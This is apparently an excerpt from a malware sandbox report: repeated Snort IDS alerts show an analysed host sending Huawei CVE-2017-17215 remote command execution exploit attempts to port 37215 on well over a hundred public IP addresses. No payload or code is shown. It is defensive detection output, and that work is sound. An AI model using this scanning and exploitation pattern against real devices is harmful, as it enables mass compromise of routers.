                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38034 -> 157.250.209.211:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35884 -> 41.71.18.154:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35884 -> 41.71.18.154:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60170 -> 157.69.76.4:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:60170 -> 157.69.76.4:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56686 -> 171.223.225.53:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56686 -> 171.223.225.53:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52254 -> 114.119.225.27:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52254 -> 114.119.225.27:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43476 -> 157.140.199.27:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43476 -> 157.140.199.27:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56734 -> 156.200.252.50:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56734 -> 156.200.252.50:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37532 -> 197.191.56.100:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37532 -> 197.191.56.100:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35936 -> 157.96.79.26:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35936 -> 157.96.79.26:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44850 -> 197.72.185.43:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44850 -> 197.72.185.43:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51518 -> 141.64.113.89:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51518 -> 141.64.113.89:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37060 -> 41.248.78.88:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37060 -> 41.248.78.88:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40802 -> 197.120.109.31:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40802 -> 197.120.109.31:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57776 -> 41.214.153.213:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57776 -> 41.214.153.213:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57352 -> 157.32.252.162:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57352 -> 157.32.252.162:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43256 -> 41.45.242.22:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43256 -> 41.45.242.22:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59238 -> 17.186.46.23:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59238 -> 17.186.46.23:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54630 -> 157.234.228.83:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:54630 -> 157.234.228.83:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38954 -> 41.162.120.1:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38954 -> 41.162.120.1:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58548 -> 41.224.168.232:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58548 -> 41.224.168.232:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59140 -> 41.36.224.221:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59140 -> 41.36.224.221:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36506 -> 41.89.207.52:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36506 -> 41.89.207.52:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60870 -> 157.116.115.96:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:60870 -> 157.116.115.96:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35650 -> 41.32.193.254:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35650 -> 41.32.193.254:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37592 -> 197.8.4.9:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37592 -> 197.8.4.9:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45216 -> 194.47.255.141:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45216 -> 194.47.255.141:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38878 -> 41.112.247.251:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38878 -> 41.112.247.251:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50042 -> 41.195.101.152:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50042 -> 41.195.101.152:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37748 -> 41.94.130.196:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37748 -> 41.94.130.196:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38332 -> 4.213.80.12:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38332 -> 4.213.80.12:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38008 -> 157.206.23.96:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38008 -> 157.206.23.96:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36372 -> 197.137.96.69:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36372 -> 197.137.96.69:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34198 -> 41.17.212.163:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34198 -> 41.17.212.163:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38180 -> 157.12.47.20:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38180 -> 157.12.47.20:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53328 -> 96.83.169.105:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53328 -> 96.83.169.105:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52778 -> 197.135.176.123:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52778 -> 197.135.176.123:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44126 -> 62.95.212.180:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44126 -> 62.95.212.180:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43798 -> 99.113.98.81:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43798 -> 99.113.98.81:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43322 -> 101.164.35.139:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43322 -> 101.164.35.139:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46220 -> 197.105.39.121:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46220 -> 197.105.39.121:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54734 -> 197.159.3.56:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:54734 -> 197.159.3.56:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34404 -> 41.199.127.113:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34404 -> 41.199.127.113:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58358 -> 41.197.165.16:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58358 -> 41.197.165.16:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49456 -> 41.241.30.157:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49456 -> 41.241.30.157:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34934 -> 157.21.161.15:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34934 -> 157.21.161.15:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52908 -> 107.157.141.231:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52908 -> 107.157.141.231:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34926 -> 197.252.73.204:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34926 -> 197.252.73.204:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48374 -> 41.225.27.111:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48374 -> 41.225.27.111:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45910 -> 157.57.3.241:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45910 -> 157.57.3.241:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42646 -> 197.136.26.55:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:42646 -> 197.136.26.55:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59892 -> 150.40.186.18:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59892 -> 150.40.186.18:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60488 -> 41.24.220.253:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:60488 -> 41.24.220.253:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47134 -> 197.194.246.230:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47134 -> 197.194.246.230:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56310 -> 157.229.194.154:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56310 -> 157.229.194.154:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48682 -> 41.102.30.246:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48682 -> 41.102.30.246:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42102 -> 157.12.58.197:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:42102 -> 157.12.58.197:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44740 -> 91.49.104.175:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44740 -> 91.49.104.175:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57102 -> 41.99.127.144:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57102 -> 41.99.127.144:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33438 -> 157.44.17.117:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33438 -> 157.44.17.117:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41292 -> 197.99.15.53:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41292 -> 197.99.15.53:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55154 -> 44.125.89.118:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55154 -> 44.125.89.118:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49230 -> 197.220.97.148:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49230 -> 197.220.97.148:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42126 -> 157.219.10.140:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:42126 -> 157.219.10.140:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45418 -> 197.191.112.197:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45418 -> 197.191.112.197:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37524 -> 41.221.103.148:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37524 -> 41.221.103.148:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51554 -> 41.112.225.204:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51554 -> 41.112.225.204:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41618 -> 197.234.153.50:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41618 -> 197.234.153.50:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54808 -> 197.28.113.23:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:54808 -> 197.28.113.23:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54368 -> 86.7.97.222:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:54368 -> 86.7.97.222:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37242 -> 41.139.194.64:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37242 -> 41.139.194.64:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39568 -> 112.127.242.7:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39568 -> 112.127.242.7:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34224 -> 197.36.130.141:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34224 -> 197.36.130.141:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47854 -> 41.212.135.246:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47854 -> 41.212.135.246:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35696 -> 157.121.58.251:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35696 -> 157.121.58.251:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41734 -> 157.22.135.1:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41734 -> 157.22.135.1:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34242 -> 41.140.31.68:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34242 -> 41.140.31.68:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36746 -> 197.220.217.63:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36746 -> 197.220.217.63:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38958 -> 197.181.19.86:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38958 -> 197.181.19.86:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42786 -> 191.98.176.241:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:42786 -> 191.98.176.241:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56976 -> 188.86.189.185:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56976 -> 188.86.189.185:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55600 -> 157.227.136.212:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55600 -> 157.227.136.212:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34832 -> 157.42.1.185:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34832 -> 157.42.1.185:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41662 -> 197.119.18.161:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41662 -> 197.119.18.161:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33500 -> 151.30.126.215:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33500 -> 151.30.126.215:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48424 -> 197.143.103.103:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48424 -> 197.143.103.103:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45396 -> 157.75.134.248:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45396 -> 157.75.134.248:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59970 -> 197.176.216.30:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59970 -> 197.176.216.30:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36380 -> 170.187.37.241:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36380 -> 170.187.37.241:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51064 -> 184.80.85.251:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51064 -> 184.80.85.251:37215
